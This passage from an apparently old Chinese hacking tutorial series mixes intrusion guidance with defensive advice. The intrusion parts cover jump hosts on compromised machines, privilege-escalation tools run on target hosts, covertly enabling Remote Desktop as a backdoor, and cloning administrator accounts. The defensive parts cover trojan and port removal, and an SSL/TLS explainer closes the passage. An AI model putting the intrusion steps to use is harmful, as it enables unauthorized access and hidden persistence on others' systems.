  对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。

对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。

B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）

net stop lanmanserver

可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。

C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。

D、还有一个办法就是装防火墙，或者端口过滤。防火墙的方法就不说了，端口过滤看这里：

过配置本地策略来禁止139/445端口的连接：

http://www.sixthroom.com/ailan/f … 2&RootID=284&ID=284

 

(本章完)

[(第26章 菜鸟进阶（6）)]

关于扫描出的漏洞

简单说明：

很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时，不要急着把它们帖在论坛上，期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的，一部分漏洞过时了，一部分是误报。如果你希望了解的多一些，最好经常到发布漏洞比较快的网站走一走，漏洞的利用是一个不段积累的过程。时间长了相信你就体会到了。

漏洞搜索：

绿盟的引擎 http://www.nsfocus.net/index.php?act=sec_bug

蓝盾的引擎 http://www.landun.org/zhongyao/sousuo.htm

补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp

安全焦点的引擎 http://www.xfocus.net/vuln/index.php

小凤居的引擎 http://lilitou1.myetang.com/

相关帖子：

一个CGI漏洞的发现和利用

http://www.sixthroom.com/ailan/f … 2&RootID=285&ID=285

cgi漏洞大全 http://www.sixthroom.com/ailan/f … 2&RootID=293&ID=293

常见CGI漏洞及应对二 http://www.sixthroom.com/ailan/f … 2&RootID=286&ID=286

常见CGI漏洞及应对一 http://www.sixthroom.com/ailan/f … 2&RootID=287&ID=287

Windows 2000漏洞集锦1 http://www.sixthroom.com/ailan/f … 2&RootID=288&ID=288

Windows 2000漏洞集锦2 http://www.sixthroom.com/ailan/f … 2&RootID=289&ID=289

Windows 2000漏洞集锦3

http://www.sixthroom.com/ailan/f … 2&RootID=290&ID=290

Windows 2000漏洞集锦4

http://www.sixthroom.com/ailan/f … 2&RootID=291&ID=291

Windows 2000漏洞集锦5

http://www.sixthroom.com/ailan/f … 2&RootID=292&ID=292

ASP漏洞大全 http://www.sixthroom.com/ailan/f … 2&RootID=294&ID=294

IIS漏洞整理一 http://www.sixthroom.com/ailan/f … 2&RootID=295&ID=295

IIS漏洞整理二 http://www.sixthroom.com/ailan/f … 2&RootID=296&ID=296

中国网络安全响应中心各种漏洞大全 http://www.cns911.com/holes/linux/list.php

 

(本章完)

[(第27章 菜鸟进阶（7）)]

关于做代理和跳板

简单介绍：

代理服务器英文全称是Proxy Cerver，其功能就是代理网络用户去取得网络信息。形象的说：它是网络信息的中转站。在一般情况下，我们使用网络浏览器直接去连接其他Internet站点取得网络信息时，须送出Request信号来得到回答，然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器，有了它之后，浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求，Request信号会先送到代理服务器，由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且，大部分代理服务器都具有缓冲的功能，就好象一个大的Cache，它有很大的存储空间，它不断将新取得数据储存到它本机的存储器上，如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的，那么它就不重新从Web服务器取数据，而直接将存储器上的数据传送给用户的浏览器，这样就能显著提高浏览速度和效率。更重要的是：Proxy Server （代理服务器）是 Internet链路级网关所提供的一种重要的安全功能，它的工作主要在开放系统互联 （OSI） 模型的对话层，有了对代理的了解，相信你也认识到了什么是跳板。

相关工具：

SocksCap 2.2 SOCKS调度工具 http://www.123gz.com/dzc/download/sc32r231.exe

SkSockServer1.04 代理跳板 http://www.123gz.com/dzc/download/sksockserver.zip

Snake跳板傻瓜版 http://www.123gz.com/dzc/download/sgtb.zip

代理猎手V3.1Beta1简装版 http://www.123gz.com/dzc/download/proxyhunter.zip

FTP Serv-U 4.0 正式汉化版，最常用的ftp服务程序 http://61.159.224.188/makesoftur … 627E207574756375737

slimftp 隐蔽的ftp服务器 http://www.whitsoftdev.com/files/slimftpd.zip

天雁WEB服务器 不用安装的小型web服务程序 http://www.cnzzz.com/download/do … 33352254709&Url=100

多种服务程序下载

http://www.zdnet.com.cn/download/windows/b…r,00.htm?sort=5

相关帖子：

代理、肉鸡、跳板的概念 http://www.sixthroom.com/ailan/f … 2&RootID=305&ID=305

代理服务器（Proxy）完全解析 http://www.sixthroom.com/ailan/f … 2&RootID=307&ID=307

如何使用代理服务器 http://www.sixthroom.com/ailan/f … 2&RootID=309&ID=309

简单制作跳板 http://www.123gz.com/dzc/sksockserver-cusky.htm

Serv-U设置教程 http://www.enanshan.com/ftp/

SocksCap32 使用详解 http://www.123gz.com/dzc/sockscap32.htm

在肉鸡上安装FTP服务器 http://www.sixthroom.com/ailan/f … 2&RootID=306&ID=306

利用 unicode 漏洞，轻松建立自己的代理服务器

http://www.123gz.com/dzc/sksockserver-nicky-1.htm#top1

特别推荐猎手与蚂蚁收藏馆 http://www.123gz.com/ （绝对值得一看）

关于提升权限

简单说明：

黑客的最终目标就是得到root（即win中的admin）权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃，但是有些漏洞（典型的如Unicode漏洞、ASP木马）不能直接获得管理员权限，所以必然需要提升权限。一些新手可能会犯这类错误，以为中了木马、获得了shell就能控制一切。结果就出现”为何不能加用户”、”为何不能开3389″等问题。2000及更高版本os承袭了NT的安全结构，多重机制环环相扣来保障安全，特别是帐户安全。无奈安全系统过于庞大，多少会出现漏洞，于是我们就有机会了。 还要补充一点，就是在拿到一个现成的后门软件，或是一个木马的时候，一定要先看看说明。至少你应该知道这个后门运行后的效果吧？更有些人上传了某个后门软件或是木马到目标后就认为完事了，你不执行它就是传个地雷上去又有什么用呢？

相关工具：

erunasx 利用Debug Registers漏洞提升权限 http://www.qq888.com/down/download.asp?Did=796

Windows NT/2000权限提升工具，可以将任意用户提升到SYSTEM级别的权限。漏洞出在smss.exe中的DEBUG子系统，所有普通用户都可以通过该漏洞获得对系统中任意进程或线程句柄的控制，从而可以以SYSTEM或管理员权限执行任意命令。2、使用方法：假设我们已经获得一台机器上的一个GUEST用户（或其他普通用户），现在我们要这个工具来获得系统最高权限。进行如下步骤：把ERunAsX.exe和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下，例如C:下。以GUEST身份运行ERunAsX 要执行命令，例如ERunAsX cmd.exe，这时执行的命令是以SYSTEM 权限运行的…（请注意：具体使用以软件内英文说明为准，内附该BUG解决办法）

PipeUpAdmin 对sp1及更低有效 http://maopao.com/down/download.asp?Did=69

ISPC 利用IIS的漏洞，详见自带说明 http://www.cnsq.net/sq88/down/show.asp?id=572&down=1

PHPBB论坛权限提升 http://www.newyouth.org/softdown … .0.exploit_code.zip

WIN帮助文件溢出（可用于XP） http://www.newyouth.org/softdown … ack/chmoverflow.zip

NT/2K权限提升工具GetAdmin下载 http://www.csdn.net/cnshare/soft/openfile.asp?kind=1&id=9807

相关帖子：

NT/2000提升权限的方法小结 http://www.sixthroom.com/ailan/f … 2&RootID=297&ID=297

关于WIN2000的入侵，以及安全防御等问题（文章包含一次利用U漏洞提高权限的过程）

http://www.sixthroom.com/ailan/f … 2&RootID=298&ID=298

UNICODE漏洞介绍及入侵

http://www.sixthroom.com/ailan/f … 2&RootID=299&ID=299

怎样提升权限，做后门

http://www.sixthroom.com/ailan/f … 2&RootID=300&ID=300

一般用户获取NT服务器Admin权限的方法

http://www.sixthroom.com/ailan/f … 2&RootID=302&ID=302

Windows NT4的安全结构（对新手有些难，了解一下吧） http://www.sixthroom.com/ailan/f … 3&RootID=303&ID=303

 

(本章完)

[(第28章 菜鸟进阶（8）)]

关于终端服务（3389）

简单说明：

windows终端服务提供了通过作为终端仿真器工作的”瘦客户机”软件远程访问服务器桌面的能力。图形界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能，因此成为一个绝好的”后门”而倍受青睐。而且win98也可以成为客户端，这使得在网吧”工作”成为可能。有一点需要强调一下使用客户端登陆远程主机对当前工作的用户没有影响，而且一切动作本地用户都是看不到的。也就是说远程登陆和本地用户是在不相同的空间，两者互不干扰。

相关工具：

WIN2000客户端

http://zudu2000.myetang.com/soft/win2k.rar

winxp下的客户端 功能比2000下的更强大

http://zudu2000.myetang.com/soft/windowsXP.zip

终端服务程序的一个补丁 使本地和远程间能复制文本 http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe

web版终端客户端 使用浏览器调用ActiveX控件访问终端服务

http://www.enanshan.com/down/tswebsetup.exe

C3389.EXE 修改终端服务端口号的工具

http://www.sandflee.net/down/show.asp?id=228&down=1

Win2k终端服务器端所需文件包

http://www.netsill.com/download/download.asp?Did=1965

3389自动安装程序-djshao正式版5.0

http://netsill.com/download/download.asp?Did=2019

开启3389工具（如果要想让远程主机开启WIN2000的终端服务，请把3389.exe也传到远程主机上并运行。然后等待一个漫长的时间（由于是无人执守安装）。就可以看到远程主机的3389端口会被打开。）

http://netsill.com/download/download.asp?Did=1991

W2K终端服务客户端安装版

http://www.sandflee.net/down/show.asp?id=39&down=1

相关帖子：

关于远程启动终端服务的帖子 http://www.sixthroom.com/ailan/f … 2&RootID=385&ID=385

终端服务问题常见问答

http://www.sixthroom.com/ailan/f … 2&RootID=386&ID=386

图文讲解输入法漏洞入侵

http://www.sandflee.net/txt/list.asp?id=22

3389自动安装工具教程

http://netsill.com/download/download.asp?Did=2068

3389动画教程（密码china）

http://netsill.com/download/download.asp?Did=1990

修改终端客户端端口动画教程

http://netsill.com/download/download.asp?Did=2009

3389资料 http://www21.brinkster.com/srob/wawa/wawa/3389txt.htm

 

(本章完)

[(第29章 菜鸟进阶（9）)]

关于克隆帐号

简单说明：

克隆帐号的原理简单的说是这样：在注册表中有两处保存了帐号的SID相对标志符,一处是SAMDomainsAccountUsers下的子键名，另一处是该子键的子项F的值中。这里微软犯了个不同步它们的错误，登陆时用的是后者，查询时用前者。当用admin的F项覆盖其他帐号的F项后，就造成了帐号是管理员权限但查询还是原来状态的情况。即所谓的克隆帐号。（前辈就是前辈把大家想到的都写出来了，我实在不知道这里在加些什么了。看来也只有这样了。大家如果还有什么不明白的就到论坛里发贴子吧。

具体的看这里：

解剖安全帐号管理器（SAM）结构 http://www.sixthroom.com/ailan/f … 3&RootID=387&ID=387

明白原理后就可以手动或者用现成的工具克隆帐号了。

相关工具：

克隆ca.exe http://www.netxeyes.org/CA.exe

检查克隆cca.exe http://www.netxeyes.org/CCA.exe

手动克隆需要SYSTEM权限，用它 psu.exe

http://www.sandflee.net/down/show.asp?id=176&down=1

相关帖子：

工具克隆：ca和cca 请访问作者主页 http://www.netxeyes.org/main.html

psu用法：psu.exe提升为system权限 http://www.sixthroom.com/ailan/f … 2&RootID=390&ID=390

手动克隆：如何克隆管理员帐号 http://www.sixthroom.com/ailan/f … 3&RootID=388&ID=388

如何克隆管理员帐号的补充 http://www.sixthroom.com/ailan/f … 3&RootID=389&ID=389

木马防范及一些端口的关闭

　一、防范木马应该注意的一些问题

　　1、不到不受信任的网站上下载软件运行

　　2、不随便点击来历不明邮件所带的附件

　　3、及时安装相应的系统补丁程序

　　4、为系统选用合适的正版杀毒软件，并及时升级相关的病毒库

　　5、为系统所有的用户设置合理的用户口令

　　口令设置要求：

　　1.口令应该不少于8个字符；

　　2.不包含字典里的单词、不包括姓氏的汉语拼音；

　　3.同时包含多种类型的字符，比如　　

　　o大写字母（A,B,C,..Z）

　　o小写字母（a,b,c..z）

　　o数字（0,1,2,…9）

　　o标点符号（@,#,!,$,%,& …）

　　win2000口令设置方法:

　　当前用户口令：在桌面环境下按crtl+alt+del键后弹出选项单，选择其中的更改密码项后按要求输入你的密码（注意：如果以前administrator没有设置密码的话，旧密码那项就不用输入，只需直接输入新的密码）。

　　其他用户口令：

　　在开始->控制面板->用户和密码->选定一个用户名->点击设置密码

　　二、检查和清除木马可能会使用到命令

　　1、如何进入命令行方式？

　　win98下在开始–>运行中输入command点确定

　　winnt、win2000、winxp下在开始–>运行中输入cmd后点确定

　　2、如何使用netstat命令？

　　netstat是用来显示网络连接、路由表和网络接口信息的命令，使用方法是在命令行下输入netstat -an后回车，输出结果格式如下：

　　Active Connections

　　Proto Local Address Foreign Address State

　　TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING

　　TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING

　　UDP 0.0.0.0:445 *:*

　　UDP 0.0.0.0:2967 *:*

　　UDP 0.0.0.0:38037 *:*

　　这其中Proto项代表是协议类型，Local Address项代表的是本地IP地址和端口（冒号后面为端口号），Foreign Address项代表的是外部IP地址和端口,State表示的是当前状态。上面这个结果表示这台机器开放了TCP的135、445、1025和1026端口，UDP的445、2967和38027端口

　　3、如何使用Fport命令？

　　Fport是查看系统进程与端口关联的命令，使用方法是在命令行方式下输入Fport后回车，输出结果格式如下：

　　Pid Process Port Proto Path

　　472 svchost -> 135 TCP C:\WINNT\system32\svchost.exe

　　8 System -> 445 TCP

　　580 MSTask -> 1025 TCP C:\WINNT\system32\MSTask.exe

　　8 System -> 1026 TCP

　　8 System -> 445 UDP

　　444 rtvscan -> 2967 UDP C:\Program Files\NavNT\rtvscan.exe

　　812 MsgSys -> 38037 UDP C:\WINNT\System32\MsgSys.EXE

　　这其中port下面代表的是系统当前开放的端口而path下面列出的是与该端口关联的程序及其所在位置。

　　从上面这个结果看，系统上135、445端口是与C:\winnt\system32\svchost.exe程序关联的1025、1026、445（udp）端口与　　　　　　　　c:\winnt\system32\mstask.exe程序关联的2967（udp）端口是与C:\Program Files\NavNT\rtvscan.exe程序关联的38027（udp）端口是与　　C:\WINNT\System32\MsgSys.EXE程序关联的

　　注：fport仅适用于winnt、win2000和winxp，在win98下无法使用

　　 4、如何编辑注册表？

　　请在开始–〉运行中输入regedit后点确定进入注册表编辑状态。注册表编辑框左边显示的是注册表的项，右边显示的是注册的键值，要删除键值请点中该键值后点右键选择其中的删除。要修改键值请点中该键值后点鼠标右键选择修改。要删除项请选中该项后点右键选删除。

　　5、如何关闭服务？

　　开始–>控制面版–>管理工具–>服务进入服务管理工具，选中要关闭的服务后点右键选停止

　　注：上面方法仅适用于WINNT、WIN2000和WINXP

　　6、如何进入安全模式？

　　系统启动时按F8

　　7、如何杀进程？

　　win98下按ALT+CTRL+DEL，在弹出的对话框中选中你要结束的进程后点关闭，winnt、win2000和winxp下按ALT+CTRL+DEL弹出窗口后选择任务管理器，在进程一项里选中你要结束的进程后点击结束进程

　　三、常见木马及控制软件的服务端口与关闭方法

　　注意：下文中提到的相关路径根据您的操作系统版本不同会有所不同，请根据自己的系统做相应的调整

　　win98系统： c:\windows c:\windows\system

　　winnt和win2000系统： c:\winnt c:\winnt\system32

　　winxp系统： c:\windows c:\windows\system32

根据系统安装的路径不同，目录所在盘符也可能不同，如系统安装在D盘，请将C:\windows改为D:\windows依此类推大部分的木马程序都可以改变默认的服务端口，我们应该根据具体的情况采取相应的措施，一个完整的检查和删除过程如下例所示：

　　例：113端口木马的清除（仅适用于windows系统）：

　　这是一个基于irc聊天室控制的木马程序。

　　1.首先使用netstat -an命令确定自己的系统上是否开放了113端口

　　2.使用fport命令察看出是哪个程序在监听113端口

　　例如我们用fport看到如下结果：

　　Pid Process Port Proto Path

　　392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe

　　我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为

　　c:\winnt\system32下。

　　3.确定了木马程序名（就是监听113端口的程序）后，在任务管理器中查找到该进程，并使用管理器结束该进程。

　　4.在开始-运行中键入regedit运行注册表管理程序，在注册表里查找刚才找到那个程序，并将相关的键值全部删掉。

　　5.到木马程序所在的目录下删除该木马程序。（通常木马还会包括其他一些程序，如，rscan.exe、p**ec.exe、ipcpass.dic、ipcscan.txt等，根据木马程序不同，文件也有所不同，你可以通过察看程序的生成和修改的时间来确定与 监听113端口的木马程序有关的其他程序）

　　6.重新启动机器。

 

(本章完)

[(第30章 菜鸟进阶（１０）)]

　　以下列出的端口仅为相关木马程序默认情况下开放的端口，请根据具体情况采取相应的操作：

　　707端口的关闭：

　　这个端口开放表示你可能感染了nachi蠕虫病毒，该蠕虫的清除方法如下：

　　停止服务名为WINS Client和Network Connections Sharing的两项服务

　　删除c:\winnt\SYSTEM32\WINS\目录下的DLLHOST.EXE和SVCHOST.EXE文件

　　编辑注册表，删除HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services项中名为RpcTftpd和RpcPatch的两个键值

　　1999端口的关闭：

　　这个端口是木马程序BackDoor的默认服务端口，该木马清除方法如下：

　　使用进程管理工具将notpa.exe进程结束

　　删除c:\windows\目录下的notpa.exe程序

　　编辑注册表，删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项中包含c:\windows

otpa.exe /o=yes的键值

　　2001端口的关闭：

　　这个端口是木马程序黑洞2001的默认服务端口，该木马清除方法如下：

　　首先使用进程管理软件将进程windows.exe杀掉

　　删除c:\winnt\system32目录下的windows.exe和S_Server.exe文件

　　编辑注册表，删除将HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\项中名为windows的键值

　　将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINE\Software\CLASSES项中的Winvxd项删除

　　修改HKEY_CLASSES_ROOT\txtfile\shell\open\command项中的c:\winnt\system32\S_SERVER.EXE %1为C:\WINNT\NOTEPAD.EXE %1

　　修改HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command项中的c:\winnt\system32\S_SERVER.EXE %1键值改为C:\WINNT\NOTEPAD.EXE %1

　　2023端口的关闭：

　　这个端口是木马程序Ripper的默认服务端口，该木马清除方法如下：

　　使用进程管理工具结束sysrunt.exe进程

　　删除c:\windows目录下的sysrunt.exe程序文件

　　编辑system.ini文件，将shell=explorer.exe sysrunt.exe 改为shell=explorer.exe后保存

　　重新启动系统

　　2583端口的关闭：

　　这个端口是木马程序Wincrash v2的默认服务端口，该木马清除方法如下：

　　编辑注册表，删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\项中的WinManager = 　c:\windows\server.exe键值

　　编辑win.ini文件，将run=c:\windows\server.exe改为run=后保存退出

　　重新启动系统后删除C:\windows\system\ SERVER.EXE

　　3389端口的关闭：

　　首先说明3389端口是windows的远程管理终端所开的端口，它并不是一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须的，请关闭该服务。

　　win2000关闭的方法：win2000server 开始–>程序–>管理工具–>服务里找到Terminal Services服务项，

　　选中属性选项将启动类型改成手动，并停止该服务。

　　win2000pro 开始–>设置–>控制面板–>管理工具–>服务里找到Terminal Services服务项，选中属性选项将启动类型改成手动，并停止该服务。

　　winxp关闭的方法：在我的电脑上点右键选属性–>远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

　　4444端口的关闭：

　　如果发现你的机器开放这个端口，可能表示你感染了msblast蠕虫，清除该蠕虫的方法如下：

　　使用进程管理工具结束msblast.exe的进程

　　编辑注册表，删除HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的windows auto update=msblast.exe键值

　　删除c:\winnt\system32目录下的msblast.exe文件

　　4899端口的关闭：

　　首先说明4899端口是一个远程控制软件（remote administrator）服务端监听的端口，他不能算是一个木马程序，但是具有远程控制功能，通常杀毒软件是无法查出它来的，请先确定该服 务是否是你自己开放并且是必需的。如果不是请关闭它。

　　关闭4899端口：

　　请在开始–>运行中输入cmd（98以下为command）,然后cd C:\winnt\system32（你的系统安装目录），输入r_server.exe /stop后按回车。然后在输入r_server /uninstall /silence 到C:\winnt\system32（系统目录）下删除r_server.exe admdll.dll raddrv.dll三个文件

　　5800，5900端口：

　　首先说明5800，5900端口是远程控制软件VNC的默认服务端口，但是VNC在修改过后会被用在某些蠕虫中。

　　请先确认VNC是否是你自己开放并且是必须的，如果不是请关闭

　　关闭的方法：

　　首先使用fport命令确定出监听在5800和5900端口的程序所在位置（通常会是c:\winnt\fonts\explorer.exe）

　　在任务管理器中杀掉相关的进程（注意有一个是系统本身正常的，请注意！如果错杀可以重新运行c:\winnt\explorer.exe）

　　删除C:\winnt\fonts\中的explorer.exe程序。

　　删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run项中的Explorer键值。

　　重新启动机器。

(本章完)

[(第31章 SSL．TLS．WTLS原理（上）)]

一 前言

首先要澄清一下名字的混淆：

1 SSL（Secure Socket Layer）是netscape公司设计的主要用于web的安全传输协议

。这种协议在WEB上获得了广泛的应用。

2 IETF（www.ietf.org）将SSL作了标准化，即RFC2246,并将其称为TLS（Transport

Layer Security），从技术上讲，TLS1.0与SSL3.0的差别非常微小。由于本文中

没有涉及两者间的细小差别，本文中这两个名字等价。

3 在WAP的环境下，由于手机及手持设备的处理和存储能力有限，wap论坛（

www.wapforum.org）在TLS的基础上做了简化，提出了WTLS协议（Wireless

Transport Layer Security），以适应无线的特殊环境。

我们从各式各样的文章中得知，SSL可以用于保密的传输，这样我们与web server

之间传输的消息便是”安全的”。

而这种”安全”究竟是怎么实现的，最终有能实现多大程度的保密？本文希望能

用通俗的语言阐明其实现原理。

二 整体结构概览

SSL是一个介于HTTP协议与TCP之间的一个可选层，其位置大致如下：

－－－－－－－－－

| HTTP |

－－－－－－－－－

| SSL |

－－－－－－－－－

| TCP |

－－－－－－－－－

| IP |

－－－－－－－－－

如果利用SSL协议来访问网页，其步骤如下：

用户：在浏览器的地址栏里输入https://www.sslserver.com

HTTP层：将用户需求翻译成HTTP请求，如

GET /index.htm HTTP/1.1

Host http://www.sslserver.com

SSL层: 借助下层协议的的信道安全的协商出一份加密密钥，并用此密钥来加密

HTTP请求。

TCP层：与web server的443端口建立连接，传递SSL处理后的数据。

接收端与此过程相反。

SSL在TCP之上建立了一个加密通道，通过这一层的数据经过了加密，因此达到保

密的效果。

SSL协议分为两部分：Handshake Protocol和Record Protocol,。其中Handshake

Protocol用来协商密钥，协议的大部分内容就是通信双方如何利用它来安全的协

商出一份密钥。 Record Protocol则定义了传输的格式。

三 需要的加密方面的基础知识

了解SSL原理需要一点点加密的概念，这里把需要的概念做一下简单阐述：

加密一般分为三类，对称加密，非对称加密及单向散列函数。

对称加密：又分分组密码和序列密码。

分组密码是将明文按一定的位长分组，明文组经过加密运算得到密文组，密文组

经过解密运算

（加密运算的逆运算），还原成明文组。

序列密码是指利用少量的密钥（制乱元素）通过某种复杂的运算（密码算法）产

生大量的伪随机位流，用于对明文位流的加密。

解密是指用同样的密钥和密码算法及与加密相同的伪随机位流，用以还原明文位

流。

CBC（Cipher Block Chaining）模式这个词在分组密码中经常会用到，它是指一个

明文分组在被加密之前要与前一个的密文分组进行异或运算。当加密算法用于此

模式的时候除密钥外，还需协商一个初始化向量（IV），这个IV没有实际意义，

只是在第一次计算的时候需要用到而已。采用这种模式的话安全性会有所提高。

分组密码的典型例子为DES,RC5,IDEA。

序列密码的典型例子为RC4。

公钥加密：

简单的说就是加密密钥与解密密钥不同，分私钥和公钥。这种方法大多用于密钥

交换，RSA便是一个我们熟知的例子。

还有一个常用的称作DH，它只能用于密钥交换，不能用来加密。

单向散列函数：

由于信道本身的干扰和人为的破坏，接受到的信息可能与原来发出的信息不同，

一个通用的办法就是加入校验码。

单向散列函数便可用于此用途，一个典型的例子是我们熟知的MD5,它产生128位的

摘要，在现实中用的更多的是安全散列算法（SHA），SHA的早期版本存在问题，

目前用的实际是SHA－1，它可以产生160位的摘要，因此比128位散列更能有效抵

抗穷举攻击。

由于单向散列的算法都是公开的，所以其它人可以先改动原文，再生成另外一份

摘要。解决这个问题的办法可以通过HMAC（RFC 2104）,它包含了一个密钥，只有

拥有相同密钥的人才能鉴别这个散列。

四 密钥协商过程

由于对称加密的速度比较慢，所以它一般用于密钥交换，双方通过公钥算法协商

出一份密钥，然后通过对称加密来通信，当然，为了保证数据的完整性，在加密

前要先经过HMAC的处理。

SSL缺省只进行server端的认证，客户端的认证是可选的。以下是其流程图（摘自

TLS协议）。

Client Server

Clienth*llo ——–>

Serverh*llo

Certificate*

ServerKeyExchange*

CertificateRequest*

<——– Serverh*lloDone

Certificate*

ClientKeyExchange

CertificateVerify*

[ChangeCipherSpec]

Finished ——–>

[ChangeCipherSpec]

<——– Finished

Application Data <——-> Application Data

简单的说便是：SSL客户端（也是TCP的客户端）在TCP链接建立之后，发出一个

Clienth*llo来发起握手，这个消息里面包含了自己可实现的算法列表和其它一些

需要的消息，SSL的服务器端会回应一个Serverh*llo，这里面确定了这次通信所

需要的算法，然后发过去自己的证书（里面包含了身份和自己的公钥）。Client

在收到这个消息后会生成一个秘密消息，用SSL服务器的公钥加密后传过去，SSL

服务器端用自己的私钥解密后，会话密钥协商成功，双方可以用同一份会话密钥

来通信了。

五 密钥协商的形象化比喻

如果上面的说明不够清晰，这里我们用个形象的比喻，我们假设A与B通信，A是

SSL客户端，B是SSL服务器端，加密后的消息放在方括号[]里，以突出明文消息的

区别。双方的处理动作的说明用圆括号（）括起。

A：我想和你安全的通话，我这里的对称加密算法有DES,RC5,密钥交换算法有RSA

和DH，摘要算法有MD5和SHA。

B：我们用DES－RSA－SHA这对组合好了。

这是我的证书，里面有我的名字和公钥，你拿去验证一下我的身份（把证书发给A

）。

目前没有别的可说的了。

A：（查看证书上B的名字是否无误，并通过手头早已有的CA的证书验证了B的证书

的真实性，如果其中一项有误，发出警告并断开连接，这一步保证了B的公钥的真

实性）

（产生一份秘密消息，这份秘密消息处理后将用作加密密钥，加密初始化向量和

hmac的密钥。将这份秘密消息-协议中称为per_master_secret-用B的公钥加密，

封装成称作ClientKeyExchange的消息。由于用了B的公钥，保证了第三方无法窃

听）

我生成了一份秘密消息，并用你的公钥加密了，给你（把ClientKeyExchange发给

B）

注意，下面我就要用加密的办法给你发消息了！

（将秘密消息进行处理，生成加密密钥，加密初始化向量和hmac的密钥）

[我说完了]

B：（用自己的私钥将ClientKeyExchange中的秘密消息解密出来，然后将秘密消

息进行处理，生成加密密钥，加密初始化向量和hmac的密钥，这时双方已经安全

的协商出一套加密办法了）

注意，我也要开始用加密的办法给你发消息了！

[我说完了]

A: [我的秘密是…]

B: [其它人不会听到的…]

六 加密的计算

上一步讲了密钥的协商，但是还没有阐明是如何利用加密密钥，加密初始化向量

和hmac的密钥来加密消息的。

其实其过程不过如此：

1 借助hmac的密钥，对明文的消息做安全的摘要处理，然后和明文放到一起。

2 借助加密密钥，加密初始化向量加密上面的消息。

七 安全性

SecurityPortal在2000年底有一份文章《The End of SSL and SSH?》激起了很多

的讨论，

目前也有一些成熟的工具如dsniff（http://www.monkey.org/~dugsong/dsniff/

）可以

通过man in the middle攻击来截获https的消息。

从上面的原理可知，SSL的结构是严谨的，问题一般出现在实际不严谨的应用中。

常见的攻击就是

middle in the middle攻击，它是指在A和B通信的同时，有第三方C处于信道的中

间，可以完全

听到A与B通信的消息，并可拦截，替换和添加这些消息。

1 SSL可以允许多种密钥交换算法，而有些算法，如DH，没有证书的概念，这样A

便无法验证B的公钥

和身份的真实性，从而C可以轻易的冒充，用自己的密钥与双方通信，从而窃听到

别人谈话的内容。

而为了防止middle in the middle攻击，应该采用有证书的密钥交换算法。

2 有了证书以后，如果C用自己的证书替换掉原有的证书之后，A的浏览器会弹出

一个警告框进行警告，但又有多少人会注意这个警告呢？

3 由于美国密码出口的限制，IE，netscape等浏览器所支持的加密强度是很弱的

，如果只采用浏览器自带的加密功能的话，理论上存在被破解可能。

(本章完)

[(第32章 SSL．TLS．WTLS原理（下）)]

八 代理

下面探讨一下SSL的代理是怎样工作的（可参见[6]）。这可能与你开始想的不太一

样：）

当在浏览器里设置了https的代理，而且在浏览器里输入了

https://www.example.com之后，

浏览器会与proxy建立tcp链接，然后向其发出这么一段消息：

CONNECT server.example.com:443 HTTP/1.1

Host: server.example.com:443

然后proxy会向webserver端建立tcp连接,之后，这个代理便完全成了个内容转发

装置。浏览器

与web server会建立一个安全通道，因此这个安全通道是端到端的，尽管所有的

信息流过了proxy,

但其内容proxy是无法解密和改动的（当然要由证书的支持，否则这个地方便是个

man in the middle攻击的好场所，见上面的讨论）。

九 关于证书

注意，如果对于一般的应用，管理员只需生成”证书请求”（后缀大多为.csr）

，它包含你的名字和公钥，然后把这份请求交给诸如verisign等有CA服务公司（

当然，连同几百美金），

你的证书请求经验证后，CA用它的私钥签名，形成正式的证书发还给你。管理员

再在web server上导入这个证书就行了。如果你不想花那笔钱，或者想了解一下

原理，可以自己做CA。

从ca的角度讲，你需要CA的私钥和公钥。从想要证书的服务器角度将，需要把服

务器的证书请求交给CA.

如果你要自己做CA，别忘了客户端需要导入CA的证书（CA的证书是自签名的，导

入它意味着你”信任”这个CA签署的证书）。

而商业CA的一般不用，因为它们已经内置在你的浏览器中了。

十 wtls

在WAP的环境中，也有安全加密的需求，因此wapforum参照在WWW世界里最为流行

的SSL协议设计了WTLS.从原理上说，这份协议与SSL是基本相同的，但在具体的地

方作了许多改动。这些改动的大多没有什么技术上的需要，而是由于考虑到手持

设备运算与存储的局限而尽量做了简化。不过我的感觉是这些改动意义实在不大

，其获得的计算和存储上节省出来的时间和空间并不多。在硬件速度突飞猛进的

时代，这种改动能获得的好处也许并不很多（一个新的协议便需要大量新的投入

